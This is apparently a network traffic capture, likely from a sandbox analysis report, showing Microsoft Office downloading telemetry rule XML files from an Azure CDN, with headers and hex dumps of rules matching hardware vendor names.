                            TimestampBytes transferredDirectionData
                            2024-11-14 22:38:55 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:38:55 UTC491INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:38:55 GMT
                            Content-Type: text/xml
                            Content-Length: 464
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                            ETag: "0x8DC582B97FB6C3C"
                            x-ms-request-id: 63ea3643-901e-0015-3101-2db284000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223855Z-16547b76f7fr28cchC1DFWnuws0000000m9000000000wxd6
                            x-fd-int-roxy-purgeid: 0
                            X-Cache-Info: L1_T2
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:38:55 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                            Session IDSource IPSource PortDestination IPDestination Port
                            33192.168.2.45516013.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:38:55 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:38:55 UTC470INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:38:55 GMT
                            Content-Type: text/xml
                            Content-Length: 419
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                            ETag: "0x8DC582B9748630E"
                            x-ms-request-id: 412bc4a2-301e-0020-47a2-346299000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223855Z-r178fb8d765w8fzdhC1DFW8ep4000000035g0000000076rg
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:38:55 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                            Session IDSource IPSource PortDestination IPDestination Port
                            34192.168.2.45516113.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:38:55 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:38:55 UTC470INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:38:55 GMT
                            Content-Type: text/xml
                            Content-Length: 472
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                            ETag: "0x8DC582B9DACDF62"
                            x-ms-request-id: 7dbe6cd5-601e-00ab-1ca2-3466f4000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223855Z-r178fb8d765mjvjchC1DFWhkyn000000031000000000hs7f
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:38:55 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                            Session IDSource IPSource PortDestination IPDestination Port
                            35192.168.2.45516213.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:38:55 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:38:56 UTC491INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:38:55 GMT
                            Content-Type: text/xml
                            Content-Length: 404
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                            ETag: "0x8DC582B9E8EE0F3"
                            x-ms-request-id: e44b56bd-701e-0053-1778-353a0a000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223855Z-1866b5c5fbbstkfjhC1DFWhdyg00000000c0000000000un3
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            X-Cache-Info: L1_T2
                            Accept-Ranges: bytes
                            2024-11-14 22:38:56 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                            Session IDSource IPSource PortDestination IPDestination Port
                            36192.168.2.45516313.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:38:56 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:38:56 UTC470INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:38:56 GMT
                            Content-Type: text/xml
                            Content-Length: 468
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                            ETag: "0x8DC582B9C8E04C8"
                            x-ms-request-id: 1e45a1cf-401e-0029-3ef1-2c9b43000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223856Z-16547b76f7fm7xw6hC1DFW5px40000000m6000000000e960
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:38:56 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                            Session IDSource IPSource PortDestination IPDestination Port
                            37192.168.2.45516413.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:38:56 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:38:56 UTC491INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:38:56 GMT
                            Content-Type: text/xml
                            Content-Length: 428
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                            ETag: "0x8DC582BAC4F34CA"
                            x-ms-request-id: 9f11ee7d-201e-0096-73f2-2cace6000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223856Z-16547b76f7fr28cchC1DFWnuws0000000m8g00000000zff6
                            x-fd-int-roxy-purgeid: 0
                            X-Cache-Info: L1_T2
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:38:56 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                            Session IDSource IPSource PortDestination IPDestination Port
                            38192.168.2.45516613.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:38:56 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:38:56 UTC491INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:38:56 GMT
                            Content-Type: text/xml
                            Content-Length: 415
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                            ETag: "0x8DC582B988EBD12"
                            x-ms-request-id: 231ce337-901e-0083-5701-2dbb55000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223856Z-16547b76f7fcrtpchC1DFW52e80000000m9g00000000h9eg
                            x-fd-int-roxy-purgeid: 0
                            X-Cache-Info: L1_T2
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:38:56 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                            Session IDSource IPSource PortDestination IPDestination Port
                            39192.168.2.45516513.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:38:56 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:38:56 UTC491INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:38:56 GMT
                            Content-Type: text/xml
                            Content-Length: 499
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                            ETag: "0x8DC582B98CEC9F6"
                            x-ms-request-id: 7a46749c-d01e-002b-4a9c-3625fb000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223856Z-r178fb8d7656shmjhC1DFWu5kw00000003900000000017r9
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            X-Cache-Info: L1_T2
                            Accept-Ranges: bytes
                            2024-11-14 22:38:56 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                            Session IDSource IPSource PortDestination IPDestination Port
                            40192.168.2.45516713.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:38:56 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:38:56 UTC470INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:38:56 GMT
                            Content-Type: text/xml
                            Content-Length: 471
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                            ETag: "0x8DC582BB5815C4C"
                            x-ms-request-id: 383c7f00-901e-008f-5aa8-3667a6000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223856Z-16547b76f7f67wxlhC1DFWah9w0000000m8g00000000c3tp
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:38:56 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                            Session IDSource IPSource PortDestination IPDestination Port
                            41192.168.2.45516813.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:38:57 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:38:57 UTC491INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:38:57 GMT
                            Content-Type: text/xml
                            Content-Length: 419
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                            ETag: "0x8DC582BB32BB5CB"
                            x-ms-request-id: d33f60ae-f01e-0085-74ec-2b88ea000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223857Z-16547b76f7f7scqbhC1DFW0m5w0000000kzg000000013z0c
                            x-fd-int-roxy-purgeid: 0
                            X-Cache-Info: L1_T2
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:38:57 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                            Session IDSource IPSource PortDestination IPDestination Port
                            42192.168.2.45516913.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:38:57 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:38:57 UTC470INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:38:57 GMT
                            Content-Type: text/xml
                            Content-Length: 494
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                            ETag: "0x8DC582BB8972972"
                            x-ms-request-id: 0faddc02-601e-005c-51a5-34f06f000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223857Z-r178fb8d765z9wvrhC1DFW1a0s0000000160000000010dg3
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:38:57 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                            Session IDSource IPSource PortDestination IPDestination Port
                            43192.168.2.45517013.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:38:57 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:38:57 UTC491INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:38:57 GMT
                            Content-Type: text/xml
                            Content-Length: 420
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                            ETag: "0x8DC582B9DAE3EC0"
                            x-ms-request-id: 3e54b24b-301e-000c-76af-36323f000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223857Z-16547b76f7fhvzzthC1DFW557000000000g0000000004cwm
                            x-fd-int-roxy-purgeid: 0
                            X-Cache-Info: L1_T2
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
